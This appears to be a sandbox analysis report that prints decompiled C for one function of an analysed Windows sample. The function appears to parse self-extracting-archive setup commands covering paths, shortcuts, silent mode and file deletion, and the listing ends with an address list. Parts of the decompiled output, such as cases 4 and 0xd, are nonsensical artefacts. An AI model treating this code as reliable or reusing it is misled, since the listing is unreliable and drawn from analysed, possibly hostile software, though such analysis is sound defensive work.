Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 943f80e6a958339623773bc97d4ba55e9766206ea6e3a58b3d77615fe96266de
Instruction ID: 7c6738dabd83a62c098b67ee3e45361a08f4e62101846eaab562f54c1b3e0d15
Opcode Fuzzy Hash: 943f80e6a958339623773bc97d4ba55e9766206ea6e3a58b3d77615fe96266de
Instruction Fuzzy Hash: B311F071A407009FD720AF36D801B9EBBE0AF10314FA0456FE8A9932A1C778A9818B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDED, Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040EDED(void* __edi) {
				long __ebx;
				intOrPtr _t263;
				void* _t264;
				void* _t335;
				short* _t337;
				void* _t339;

				L0:
				while(1) {
					L0:
					if( *((intOrPtr*)(_t339 + 0x10)) != 6) {
						goto L160;
					} else {
						__eax = 0;
						 *(__ebp - 0x2440) = __ax;
						__eax =  *(__ebp - 0x1bc90) & 0x0000ffff;
						__eax = E0041CB95( *(__ebp - 0x1bc90) & 0x0000ffff);
						_push(__ebx);
						__eflags = __eax - 0x50;
						if(__eax == 0x50) {
							_push(0x43ecd8);
							__eax = __ebp - 0x2440;
							_push(__ebp - 0x2440);
							__eax = E0041078F();
							 *(__ebp - 0x18) = 2;
						} else {
							__eflags = __eax - 0x54;
							__eax = __ebp - 0x2440;
							if(__eflags == 0) {
								_push(0x43dcd8);
								_push(__eax);
								__eax = E0041078F();
								 *(__ebp - 0x18) = 7;
							} else {
								_push(0x43fcd8);
								_push(__eax);
								__eax = E0041078F();
								 *(__ebp - 0x18) = 0x10;
							}
						}
						__eax = 0;
						 *(__ebp - 0xbc90) = __ax;
						 *(__ebp - 0x4c40) = __ax;
						__ebp - 0x19c90 = __ebp - 0x6c88;
						__eax = E0041A0EF(__ebp - 0x6c88, __ebp - 0x19c90);
						__eflags =  *(__ebp - 0x6c88) - 0x22;
						_pop(__ecx);
						_pop(__ecx);
						if( *(__ebp - 0x6c88) != 0x22) {
							__ebp - 0x6c88 = E00409026(__ebp - 0x6c88);
							__eflags = __al;
							if(__al != 0) {
								goto L145;
							}
							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000000;
							__eflags =  *(__ebp - 0x6c88);
							__edi = __ebp - 0x6c88;
							if( *(__ebp - 0x6c88) == 0) {
								goto L145;
							} else {
								goto L133;
							}
							do {
								L133:
								__eax = __edi->i & 0x0000ffff;
								__eflags = __ax - 0x20;
								if(__ax == 0x20) {
									L135:
									__esi = __ax & 0x0000ffff;
									__eax = 0;
									__edi->i = __ax;
									__ebp - 0x6c88 = E00409026(__ebp - 0x6c88);
									__eflags = __al;
									if(__al == 0) {
										__edi->i = __si;
										goto L142;
									}
									 *(__ebp - 0x10) = __edi;
									__eflags = __si - 0x2f;
									if(__si != 0x2f) {
										do {
											__edi =  &(__edi->i);
											__edi =  &(__edi->i);
											__eflags = __edi->i - 0x20;
										} while (__edi->i == 0x20);
										_push(__edi);
										__eax = __ebp - 0x4c40;
										L140:
										E0041A0EF() =  *(__ebp - 0x10);
										__ecx = __eax;
										_pop(__ecx);
										 *( *(__ebp - 0x10)) = __si;
										goto L142;
									}
									__eax = 0x2f;
									 *(__ebp - 0x4c40) = __ax;
									__eax =  &(__edi->i);
									_push( &(__edi->i));
									__eax = __ebp - 0x4c3e;
									goto L140;
								}
								__eflags = __ax - 0x2f;
								if(__ax != 0x2f) {
									goto L142;
								}
								goto L135;
								L142:
								__edi =  &(__edi->i);
								__edi =  &(__edi->i);
								__eflags = __edi->i;
							} while (__edi->i != 0);
							__eflags =  *(__ebp - 0x10);
							if( *(__ebp - 0x10) != 0) {
								__ecx =  *(__ebp - 0x10);
								__eax = 0;
								__eflags = 0;
								 *( *(__ebp - 0x10)) = __ax;
							}
							goto L145;
						} else {
							__ebp - 0x19c8e = __ebp - 0x6c88;
							E0041A0EF(__ebp - 0x6c88, __ebp - 0x19c8e) = __ebp - 0x6c86;
							__eax = E0041C359(__ebp - 0x6c86, 0x22);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = 0;
								 *__eax = __cx;
								__ebp - 0x4c40 = E0041A0EF(__ebp - 0x4c40, __ebp - 0x4c40);
								_pop(__ecx);
								_pop(__ecx);
							}
							L145:
							__esi = 0;
							__eflags =  *((intOrPtr*)(__ebp - 0x11c90)) - __si;
							if( *((intOrPtr*)(__ebp - 0x11c90)) != __si) {
								__ebp - 0xbc90 = __ebp - 0x11c90;
								__eax = E0040A72F(__edi, __ebp - 0x11c90, __ebp - 0xbc90, __ebx);
							}
							__ebp - 0xcc90 = __ebp - 0x6c88;
							__eax = E0040A72F(__edi, __ebp - 0x6c88, __ebp - 0xcc90, __ebx);
							__eflags =  *(__ebp - 0x2440) - __si;
							if(__eflags == 0) {
								__ebp - 0x2440 = E0040CE92(__ecx, __ebp - 0x2440,  *(__ebp - 0x18));
							}
							__ebp - 0x2440 = E00409DEB(__eflags, __ebp - 0x2440, __ebx);
							__eflags =  *((intOrPtr*)(__ebp - 0x17c90)) - __si;
							if(__eflags != 0) {
								__ebp - 0x17c90 = __ebp - 0x2440;
								E004107BC(__eflags, __ebp - 0x2440, __ebp - 0x17c90, __ebx) = __ebp - 0x2440;
								__eax = E00409DEB(__eflags, __ebp - 0x2440, __ebx);
							}
							__ebp - 0x2440 = __ebp - 0xac90;
							__eax = E0041A0EF(__ebp - 0xac90, __ebp - 0x2440);
							_pop(__ecx);
							_pop(__ecx);
							__eax = __ebp - 0x13c90;
							__eflags =  *(__ebp - 0x13c90) - __si;
							if(__eflags == 0) {
								__eax = __ebp - 0x19c90;
							}
							__ebp - 0x2440 = E004107BC(__eflags, __ebp - 0x2440, __ebp - 0x2440, __ebx);
							__eax = __ebp - 0x2440;
							__eflags = E0040A25D(__ebp - 0x2440) - __esi;
							if(__eflags == 0) {
								L155:
								__ebp - 0x2440 = E004107BC(__eflags, __ebp - 0x2440, L".lnk", __ebx);
								goto L156;
							} else {
								__eflags = __eax;
								if(__eflags == 0) {
									L156:
									__ebp - 0x2440 = E004090CB(__ebx, __ecx, __edi, __ebp - 0x2440, 1);
									__ebp - 0xcc90 = __ebp - 0x9c90;
									__eax = E0041A0EF(__ebp - 0x9c90, __ebp - 0xcc90);
									_pop(__ecx);
									_pop(__ecx);
									__ebp - 0x9c90 = E0040A2E6(__eflags, __ebp - 0x9c90);
									 *(__ebp - 0x4c40) & 0x0000ffff =  ~( *(__ebp - 0x4c40) & 0x0000ffff);
									asm("sbb eax, eax");
									__ecx = __ebp - 0x4c40;
									__eax =  ~( *(__ebp - 0x4c40) & 0x0000ffff) & __ebp - 0x00004c40;
									 *(__ebp - 0xbc90) & 0x0000ffff =  ~( *(__ebp - 0xbc90) & 0x0000ffff);
									asm("sbb ecx, ecx");
									__edx = __ebp - 0xbc90;
									__ecx =  ~( *(__ebp - 0xbc90) & 0x0000ffff) & __ebp - 0x0000bc90;
									 *(__ebp - 0x15c90) & 0x0000ffff =  ~( *(__ebp - 0x15c90) & 0x0000ffff);
									asm("sbb edx, edx");
									__esi = __ebp - 0x15c90;
									__edx =  ~( *(__ebp - 0x15c90) & 0x0000ffff) & __ebp - 0x00015c90;
									 *(__ebp - 0x9c90) & 0x0000ffff =  ~( *(__ebp - 0x9c90) & 0x0000ffff);
									asm("sbb esi, esi");
									__edi = __ebp - 0x9c90;
									__esi =  ~( *(__ebp - 0x9c90) & 0x0000ffff) & __edi;
									__ebp - 0x2440 = __ebp - 0xcc90;
									__eax = E00419655(__ecx, 0, __ebp - 0xcc90, __ebp - 0x2440, __esi,  ~( *(__ebp - 0x15c90) & 0x0000ffff) & __ebp - 0x00015c90, __ecx,  ~( *(__ebp - 0x4c40) & 0x0000ffff) & __ebp - 0x00004c40);
									__eflags =  *(__ebp - 0xac90);
									if( *(__ebp - 0xac90) != 0) {
										__eax = __ebp - 0xac90;
										SHChangeNotify(0x1000, 5, __ebp - 0xac90, 0);
									}
									while(1) {
										L160:
										_t263 = E0040D46E(_t339 - 0x11, _t339 - 0xec90, _t337,  *((intOrPtr*)(_t339 + 0xc)), _t339 - 0x4440, _t339 + 0xf, 0x1000);
										 *((intOrPtr*)(_t339 + 0xc)) = _t263;
										if(_t263 != 0) {
											_t335 = GetFileAttributesW;
											_t322 = _t339 - 0x1bc90;
											_t337 = 0x437cd0;
											_t264 = _t339 - 0x4440;
											 *(_t339 - 0x10) = _t339 - 0x1bc90;
											 *((intOrPtr*)(_t339 - 0x18)) = 6;
											goto L2;
										} else {
											break;
										}
										L4:
										while(E004119A6(_t339 - 0xec90,  *((intOrPtr*)(0x42f0f8 +  *(_t339 - 0x10) * 4))) != 0) {
											 *(_t339 - 0x10) =  *(_t339 - 0x10) + 1;
											if( *(_t339 - 0x10) < 0xe) {
												continue;
											} else {
												goto L160;
											}
										}
										__eflags =  *(_t339 - 0x10) - 0xd;
										if( *(_t339 - 0x10) > 0xd) {
											continue;
										}
										switch( *((intOrPtr*)( *(_t339 - 0x10) * 4 +  &M0040F16E))) {
											case 0:
												__eflags =  *((intOrPtr*)(_t339 + 0x10)) - 2;
												if( *((intOrPtr*)(_t339 + 0x10)) != 2) {
													goto L160;
												}
												E00419740(_t339 - 0x8c90, _t319);
												E00409E1B(_t339 - 0x8c90, _t339 - 0x4440, _t339 - 0xfc90, _t319);
												E004091A0(_t339 - 0x7c90);
												 *(_t339 - 4) =  *(_t339 - 4) & 0x00000000;
												E004091C9(_t339 - 0x7c90, _t339 - 0xfc90);
												E004065D5(_t339 - 0x5c88);
												_push(0);
												_t280 = E0040937B(_t339 - 0x7c90, _t333, _t339 - 0x5c88);
												__eflags = _t280;
												if(_t280 == 0) {
													L25:
													 *(_t339 - 4) =  *(_t339 - 4) | 0xffffffff;
													E004091B6(_t339 - 0x7c90);
													goto L160;
												} else {
													_t337 = L"%s.%d.tmp";
													do {
														SetFileAttributesW(_t339 - 0x5c88, 0);
														__eflags =  *((char*)(_t339 - 0x4c7c));
														if(__eflags == 0) {
															L17:
															_t285 = GetFileAttributesW(_t339 - 0x5c88);
															__eflags = _t285 - 0xffffffff;
															if(_t285 == 0xffffffff) {
																goto L24;
															}
															_t289 = DeleteFileW(_t339 - 0x5c88);
															__eflags = _t289;
															if(_t289 != 0) {
																goto L24;
															} else {
																 *(_t339 - 0x10) =  *(_t339 - 0x10) & _t289;
																_push(_t289);
																goto L21;
																L21:
																E0040D452(_t339 - 0x1040, _t319, _t337, _t339 - 0x5c88);
																_t341 = _t341 + 0x14;
																_t294 = GetFileAttributesW(_t339 - 0x1040);
																__eflags = _t294 - 0xffffffff;
																if(_t294 != 0xffffffff) {
																	_t61 = _t339 - 0x10;
																	 *_t61 =  *(_t339 - 0x10) + 1;
																	__eflags =  *_t61;
																	_push( *(_t339 - 0x10));
																	goto L21;
																} else {
																	_t297 = MoveFileW(_t339 - 0x5c88, _t339 - 0x1040);
																	__eflags = _t297;
																	if(_t297 != 0) {
																		MoveFileExW(_t339 - 0x1040, 0, 4);
																	}
																	goto L24;
																}
															}
														}
														E0040A4F3(__eflags, _t339 - 0x8c90, _t339 - 0x1040, _t319);
														E00409DEB(__eflags, _t339 - 0x1040, _t319);
														_t306 = E0041A0A7(_t339 - 0x8c90);
														 *((intOrPtr*)(_t339 - 0x18)) = _t306;
														__eflags = _t306 - 4;
														if(_t306 < 4) {
															L15:
															_t308 = E00409DA5(_t339 - 0x4440);
															__eflags = _t308;
															if(_t308 != 0) {
																goto L25;
															}
															L16:
															_t310 = E0041A0A7(_t339 - 0x5c88);
															__eflags = 0;
															 *((short*)(_t339 + _t310 * 2 - 0x5c86)) = 0;
															E0041A110(_t335, _t339 - 0x40, 0, 0x1e);
															_t341 = _t341 + 0x10;
															_push(0x14);
															_pop(_t313);
															 *((short*)(_t339 - 0x30)) = _t313;
															 *((intOrPtr*)(_t339 - 0x38)) = _t339 - 0x5c88;
															 *((intOrPtr*)(_t339 - 0x3c)) = 3;
															SHFileOperationW(_t339 - 0x40);
															goto L17;
														}
														_t318 = E0041A0A7(_t339 - 0x1040);
														__eflags =  *((intOrPtr*)(_t339 - 0x18)) - _t318;
														if( *((intOrPtr*)(_t339 - 0x18)) > _t318) {
															goto L16;
														}
														goto L15;
														L24:
														_push(0);
														_t287 = E0040937B(_t339 - 0x7c90, _t333, _t339 - 0x5c88);
														__eflags = _t287;
													} while (_t287 != 0);
													goto L25;
												}
											case 1:
												__eflags =  *(__ebp + 0x10);
												if( *(__ebp + 0x10) == 0) {
													__eflags =  *((char*)(__ebp - 0x11));
													if(__eflags == 0) {
														__edi = __ebp + 0xc;
														__edi = E0040D61A(__ebp + 0xc, __eflags);
													} else {
														__edi = __ebp - 0x4440;
													}
													__eflags =  *((char*)(__ebp - 0x12));
													if( *((char*)(__ebp - 0x12)) == 0) {
														__esi = E0041A0A7( *0x440d04);
													} else {
														__esi = 0;
													}
													__eax = E0041A0A7(__edi);
													__eax = __eax + __esi;
													_push(__eax);
													_push( *0x440d04);
													__eax = E00419E8C(__ebx, __edi, __esi, __eflags);
													__esp = __esp + 0xc;
													__eflags =  *((char*)(__ebp - 0x12));
													 *0x440d04 = __eax;
													if( *((char*)(__ebp - 0x12)) != 0) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
													__eax = E0041A0C1(__eax, __edi);
													__eflags =  *((char*)(__ebp - 0x11));
													_pop(__ecx);
													_pop(__ecx);
													if(__eflags == 0) {
														_push(__edi);
														__eax = E00419DFE(__ebx, __edi, __esi, __eflags);
														_pop(__ecx);
													}
												}
												goto L160;
											case 2:
												__eflags =  *(__ebp + 0x10);
												if( *(__ebp + 0x10) == 0) {
													__ebp - 0x4440 = SetWindowTextW( *(__ebp + 8), __ebp - 0x4440);
												}
												goto L160;
											case 3:
												__eflags =  *(__ebp + 0x10);
												if( *(__ebp + 0x10) != 0) {
													goto L160;
												}
												__eflags =  *0x440d32;
												if( *0x440d32 != 0) {
													goto L160;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x4440) - 0x22;
												__edi = __ebp - 0x4440;
												 *(__ebp - 0x18) = __edi;
												 *(__ebp - 0x1040) = __ax;
												if( *(__ebp - 0x4440) == 0x22) {
													__edi = __ebp - 0x443e;
													 *(__ebp - 0x18) = __edi;
												}
												__eax = E0041A0A7(__edi);
												__eflags = __eax - __ebx;
												if(__eax >= __ebx) {
													goto L160;
												} else {
													__eax = __edi->i & 0x0000ffff;
													__eflags = __ax - 0x2e;
													if(__ax != 0x2e) {
														L50:
														__eflags = __ax - 0x5c;
														if(__ax == 0x5c) {
															L62:
															_push(__edi);
															L63:
															__eax = __ebp - 0x1040;
															_push(__ebp - 0x1040);
															__eax = E0041A0EF();
															L64:
															_pop(__ecx);
															_pop(__ecx);
															L65:
															__eax = __ebp - 0x1040;
															__eax = E0041C37F(__ebp - 0x1040, 0x22);
															_pop(__ecx);
															_pop(__ecx);
															__eflags = __eax;
															if(__eax != 0) {
																__eflags =  *((short*)(__eax + 2));
																if( *((short*)(__eax + 2)) == 0) {
																	__ecx = 0;
																	__eflags = 0;
																	 *__eax = __cx;
																}
															}
															__ebp - 0x1040 = E0041A0EF(__esi, __ebp - 0x1040);
															_pop(__ecx);
															_pop(__ecx);
															__ebp - 0x1040 = E0040D803(__esi, __ebp - 0x1040, __ebx);
															__edi = GetDlgItem( *(__ebp + 8), 0x66);
															__ebp - 0x1040 = SetWindowTextW(__edi, __ebp - 0x1040); // executed
															__eax = SendMessageW(__edi, 0x143, 0, __esi); // executed
															__eax = __ebp - 0x1040;
															__eax = E0041A311(__esi, __ebp - 0x1040);
															_pop(__ecx);
															_pop(__ecx);
															__eflags = __eax;
															if(__eax != 0) {
																__ebp - 0x1040 = SendMessageW(__edi, 0x143, 0, __ebp - 0x1040);
															}
															goto L160;
														}
														__eflags = __ax;
														if(__ax == 0) {
															L53:
															__eax = __ebp - 0x1c;
															__eax = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x1c);
															__eflags = __eax;
															if(__eax == 0) {
																__ebp - 0x10 = __ebp - 0x1040;
																__eax = __ebp - 0x20;
																 *(__ebp - 0x10) = 0x1000;
																RegQueryValueExW( *(__ebp - 0x1c), L"ProgramFilesDir", 0, __ebp - 0x20, __ebp - 0x1040, __ebp - 0x10) = RegCloseKey( *(__ebp - 0x1c));
																 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
																__eax = 0x7ff;
																__eflags =  *(__ebp - 0x10) - 0x7ff;
																if( *(__ebp - 0x10) < 0x7ff) {
																	__eax =  *(__ebp - 0x10);
																}
																__ecx = 0;
																__eflags = 0;
																 *((short*)(__ebp + __eax * 2 - 0x1040)) = __cx;
															}
															__eflags =  *(__ebp - 0x1040);
															if( *(__ebp - 0x1040) != 0) {
																__eax = __ebp - 0x1040;
																__eax = E0041A0A7(__ebp - 0x1040);
																__eflags =  *((short*)(__ebp + __eax * 2 - 0x1042)) - 0x5c;
																if( *((short*)(__ebp + __eax * 2 - 0x1042)) != 0x5c) {
																	__ebp - 0x1040 = E0041A0C1(__ebp - 0x1040, "\\");
																	_pop(__ecx);
																	_pop(__ecx);
																}
															}
															__edi = E0041A0A7(__edi);
															__eax = __ebp - 0x1040;
															__edi = __edi + E0041A0A7(__ebp - 0x1040);
															__eflags = __edi - 0x7ff;
															if(__edi >= 0x7ff) {
																goto L65;
															} else {
																__ebp - 0x1040 = E0041A0C1(__ebp - 0x1040,  *(__ebp - 0x18));
																goto L64;
															}
														}
														__eflags = __edi->i - 0x3a;
														if(__edi->i == 0x3a) {
															goto L62;
														}
														goto L53;
													}
													__eflags = __edi->i - 0x5c;
													if(__edi->i != 0x5c) {
														goto L50;
													}
													_t97 = __edi + 4; // 0x26
													__eax = _t97;
													__eflags =  *__eax;
													if( *__eax == 0) {
														goto L160;
													} else {
														_push(__eax);
														goto L63;
													}
												}
											case 4:
												__eflags =  *0x440d2c - 1;
												__eflags = __eax - 0x440d2c;
												__edi->i = __edi->i + __ecx;
												__eflags = __edi->i & __dh;
												_push(es);
												 *__eax =  *__eax + __al;
												__eflags =  *__eax;
											case 5:
												__eax =  *(__ebp - 0x4440) & 0x0000ffff;
												__eax =  *(__ebp - 0x4440) & 0x0000ffff;
												__eflags = __eax;
												if(__eax == 0) {
													L82:
													 *0x440cdf = 0;
													 *0x440cde = 1;
													goto L160;
												}
												__eax = __eax - 0x30;
												__eflags = __eax;
												if(__eax == 0) {
													 *0x440cdf = 0;
													L81:
													 *0x440cde = 0;
													goto L160;
												}
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eax == 0) {
													goto L82;
												}
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eax != 0) {
													goto L160;
												}
												 *0x440cdf = 1;
												goto L81;
											case 6:
												__eflags =  *(__ebp + 0x10) - 4;
												if( *(__ebp + 0x10) != 4) {
													goto L92;
												}
												__eax = __ebp - 0x4440;
												__eax = E0041A311(__ebp - 0x4440, L"<>");
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax == 0) {
													goto L92;
												}
												_push(0);
												goto L91;
											case 7:
												__eflags =  *(__ebp + 0x10) - 1;
												if(__eflags != 0) {
													L112:
													__eflags =  *(__ebp + 0x10) - 7;
													if( *(__ebp + 0x10) == 7) {
														__eflags =  *0x440d2c;
														if( *0x440d2c == 0) {
															 *0x440d2c = 2;
														}
														 *0x440d28 = 1;
													}
													goto L160;
												}
												__ebp - 0x8c90 = GetTempPathW(__ebx, __ebp - 0x8c90);
												__ebp - 0x8c90 = E00409DEB(__eflags, __ebp - 0x8c90, __ebx);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000000;
												_push(0);
												__esi = L"%s%s%d";
												while(1) {
													_push( *0x42f0c0);
													__ebp - 0x8c90 = __ebp - 0x1040;
													E0040D452(__ebp - 0x1040, __ebx, __esi, __ebp - 0x8c90) = __ebp - 0x1040;
													_push(__ebp - 0x1040);
													__eax = __edi->i();
													__eflags = __eax - 0xffffffff;
													if(__eax == 0xffffffff) {
														break;
													}
													_t146 = __ebp - 0x10;
													 *_t146 =  *(__ebp - 0x10) + 1;
													__eflags =  *_t146;
													_push( *(__ebp - 0x10));
												}
												__ebp - 0x1040 = SetDlgItemTextW( *(__ebp + 8), 0x66, __ebp - 0x1040);
												__eflags =  *(__ebp - 0x4440);
												if( *(__ebp - 0x4440) == 0) {
													goto L160;
												}
												__eflags =  *0x440cfe;
												if( *0x440cfe != 0) {
													goto L160;
												}
												__eax = 0;
												 *(__ebp - 0x1440) = __ax;
												__eax = __ebp - 0x4440;
												__eax = E0041C359(__ebp - 0x4440, 0x2c);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													L108:
													__eflags =  *(__ebp - 0x1440);
													if( *(__ebp - 0x1440) == 0) {
														__ebp - 0x1bc90 = __ebp - 0x4440;
														E0041A0EF(__ebp - 0x4440, __ebp - 0x1bc90) = __ebp - 0x19c90;
														__ebp - 0x1440 = E0041A0EF(__ebp - 0x1440, __ebp - 0x19c90);
													}
													__ebp - 0x4440 = E0040CECC(__ebp - 0x4440);
													__eax = 0;
													 *(__ebp - 0x3440) = __ax;
													__ebp - 0x1440 = __ebp - 0x4440;
													__eax = MessageBoxW( *(__ebp + 8), __ebp - 0x4440, __ebp - 0x1440, 0x24);
													__eflags = __eax - 6;
													if(__eax == 6) {
														goto L160;
													} else {
														 *0x440cfd = 1;
														 *0x440cea = 1;
														__eax = EndDialog( *(__ebp + 8), 1);
														goto L112;
													}
												}
												__ecx = 0;
												__eflags =  *(__ebp - 0x4440) - __cx;
												if( *(__ebp - 0x4440) == __cx) {
													goto L108;
												}
												__eax = __ebp - 0x4440;
												while(1) {
													__eflags =  *__eax - 0x40;
													if( *__eax == 0x40) {
														break;
													}
													__ecx = __ecx + 1;
													__eax = __ebp + __ecx * 2 - 0x4440;
													__eflags =  *__eax;
													if( *__eax != 0) {
														continue;
													}
													goto L108;
												}
												__esi = __ecx + __ecx;
												__ebp + __esi - 0x443e = __ebp - 0x1440;
												__eax = E0041A0EF(__ebp - 0x1440, __ebp + __esi - 0x443e);
												_pop(__ecx);
												__eax = 0;
												__eflags = 0;
												_pop(__ecx);
												 *(__ebp + __esi - 0x4440) = __ax;
												goto L108;
											case 8:
												__eflags =  *(__ebp + 0x10) - 3;
												if( *(__ebp + 0x10) == 3) {
													__eflags =  *(__ebp - 0x4440);
													if(__eflags != 0) {
														__ebp - 0x4440 = SetWindowTextW( *(__ebp + 8), __ebp - 0x4440);
													}
													__edi = __ebp + 0xc;
													 *0x440d08 = E0040D61A(__edi, __eflags);
												}
												 *0x440cff = 1;
												goto L160;
											case 9:
												__eflags =  *(__ebp + 0x10) - 5;
												if( *(__ebp + 0x10) != 5) {
													L92:
													 *0x440d10 = 1;
													goto L160;
												}
												_push(1);
												L91:
												_push( *(__ebp + 8));
												__ecx = __ebp - 0x4440;
												__eax = E0040E152(__ecx); // executed
												goto L92;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp + 0x10) - 7;
												if( *(__ebp + 0x10) == 7) {
													 *0x440d30 = 1;
												}
												goto L160;
											case 0xc:
												__eax =  *(__ebp - 0x4440) & 0x0000ffff;
												__eax = E0041CB95( *(__ebp - 0x4440) & 0x0000ffff);
												__eflags = __eax - 0x46;
												if(__eax == 0x46) {
													 *0x440cdd = 1;
												} else {
													__eflags = __eax - 0x55;
													if(__eax == 0x55) {
														 *0x440cdc = 1;
													} else {
														 *0x440cdd = 0;
														 *0x440cdc = 0;
													}
												}
												goto L160;
											case 0xd:
												 *0x440d11 = 1;
												__eax = __eax + 0x440d11;
												__ecx = __ecx + __ebp;
												 *0x7d830000 =  *0x7d830000 ^ __eax;
												__eflags =  *0x7d830000;
												goto L160;
										}
										L2:
										_t264 = E0040D9A5(_t322, _t264,  *(_t339 - 0x10));
										 *(_t339 - 0x10) =  *(_t339 - 0x10) + 0x2000;
										_t9 = _t339 - 0x18;
										 *_t9 =  *((intOrPtr*)(_t339 - 0x18)) - 1;
										if( *_t9 != 0) {
											goto L2;
										} else {
											 *(_t339 - 0x10) =  *(_t339 - 0x10) & 0x00000000;
											goto L4;
										}
									}
									 *[fs:0x0] =  *((intOrPtr*)(_t339 - 0xc));
									return _t263;
								}
								goto L155;
							}
						}
					}
				}
			}

0x00000000
0x0040eded
0x0040eded
0x0040edf1
0x00000000
0x0040edf7
0x0040edf7
0x0040edf9
0x0040ee00
0x0040ee08
0x0040ee0e
0x0040ee0f
0x0040ee12
0x0040ee47
0x0040ee4c
0x0040ee52
0x0040ee53
0x0040ee58
0x0040ee14
0x0040ee14
0x0040ee17
0x0040ee1d
0x0040ee33
0x0040ee38
0x0040ee39
0x0040ee3e
0x0040ee1f
0x0040ee1f
0x0040ee24
0x0040ee25
0x0040ee2a
0x0040ee2a
0x0040ee1d
0x0040ee5f
0x0040ee61
0x0040ee68
0x0040ee76
0x0040ee7d
0x0040ee82
0x0040ee8a
0x0040ee8b
0x0040ee8c
0x0040eedd
0x0040eee2
0x0040eee4
0x00000000
0x00000000
0x0040eeea
0x0040eeee
0x0040eef6
0x0040eefc
0x00000000
0x00000000
0x00000000
0x00000000
0x0040eefe
0x0040eefe
0x0040eefe
0x0040ef01
0x0040ef05
0x0040ef0d
0x0040ef0d
0x0040ef10
0x0040ef12
0x0040ef1c
0x0040ef21
0x0040ef23
0x0040ef63
0x00000000
0x0040ef63
0x0040ef25
0x0040ef28
0x0040ef2c
0x0040ef44
0x0040ef44
0x0040ef45
0x0040ef46
0x0040ef46
0x0040ef4c
0x0040ef4d
0x0040ef53
0x0040ef59
0x0040ef5c
0x0040ef5d
0x0040ef5e
0x00000000
0x0040ef5e
0x0040ef30
0x0040ef31
0x0040ef38
0x0040ef3b
0x0040ef3c
0x00000000
0x0040ef3c
0x0040ef07
0x0040ef0b
0x00000000
0x00000000
0x00000000
0x0040ef66
0x0040ef66
0x0040ef67
0x0040ef68
0x0040ef68
0x0040ef6e
0x0040ef72
0x0040ef74
0x0040ef77
0x0040ef77
0x0040ef79
0x0040ef79
0x00000000
0x0040ee8e
0x0040ee95
0x0040eea1
0x0040eeaa
0x0040eeb2
0x0040eeb4
0x0040eeba
0x0040eebc
0x0040eeca
0x0040eecf
0x0040eed0
0x0040eed0
0x0040ef7c
0x0040ef7c
0x0040ef7e
0x0040ef85
0x0040ef8f
0x0040ef96
0x0040ef96
0x0040efa3
0x0040efaa
0x0040efaf
0x0040efb6
0x0040efc2
0x0040efc2
0x0040efcf
0x0040efd4
0x0040efdb
0x0040efe5
0x0040eff2
0x0040eff9
0x0040eff9
0x0040f005
0x0040f00c
0x0040f011
0x0040f012
0x0040f013
0x0040f019
0x0040f020
0x0040f022
0x0040f022
0x0040f037
0x0040f03c
0x0040f048
0x0040f04a
0x0040f05b
0x0040f068
0x00000000
0x0040f04c
0x0040f057
0x0040f059
0x0040f06d
0x0040f076
0x0040f082
0x0040f089
0x0040f08e
0x0040f08f
0x0040f097
0x0040f0a3
0x0040f0a5
0x0040f0a7
0x0040f0ad
0x0040f0b6
0x0040f0b8
0x0040f0ba
0x0040f0c0
0x0040f0c9
0x0040f0cb
0x0040f0cd
0x0040f0d3
0x0040f0de
0x0040f0e1
0x0040f0e3
0x0040f0e9
0x0040f0f3
0x0040f0fc
0x0040f101
0x0040f109
0x0040f10d
0x0040f11b
0x0040f11b
0x0040f130
0x0040f130
0x0040f14c
0x0040f151
0x0040f156
0x0040e5d4
0x0040e5da
0x0040e5e0
0x0040e5e5
0x0040e5eb
0x0040e5ee
0x0040e5ee
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e60e
0x0040e628
0x0040e62f
0x00000000
0x0040e631
0x00000000
0x0040e631
0x0040e62f
0x0040e636
0x0040e63a
0x00000000
0x00000000
0x0040e643
0x00000000
0x0040e64a
0x0040e64e
0x00000000
0x00000000
0x0040e65c
0x0040e677
0x0040e682
0x0040e687
0x0040e698
0x0040e6a3
0x0040e6a8
0x0040e6b7
0x0040e6bc
0x0040e6be
0x0040e81d
0x0040e81d
0x0040e827
0x00000000
0x0040e6c4
0x0040e6c4
0x0040e6c9
0x0040e6d2
0x0040e6d8
0x0040e6df
0x0040e787
0x0040e78e
0x0040e790
0x0040e793
0x00000000
0x00000000
0x0040e79c
0x0040e7a2
0x0040e7a4
0x00000000
0x0040e7a6
0x0040e7a6
0x0040e7a9
0x0040e7aa
0x0040e7b2
0x0040e7c2
0x0040e7c7
0x0040e7d1
0x0040e7d3
0x0040e7d6
0x0040e7ac
0x0040e7ac
0x0040e7ac
0x0040e7af
0x00000000
0x0040e7d8
0x0040e7e6
0x0040e7ec
0x0040e7ee
0x0040e7fb
0x0040e7fb
0x00000000
0x0040e7ee
0x0040e7d6
0x0040e7a4
0x0040e6f4
0x0040e701
0x0040e70d
0x0040e713
0x0040e716
0x0040e719
0x0040e72d
0x0040e734
0x0040e739
0x0040e73b
0x00000000
0x00000000
0x0040e741
0x0040e748
0x0040e74d
0x0040e751
0x0040e75e
0x0040e763
0x0040e766
0x0040e768
0x0040e769
0x0040e773
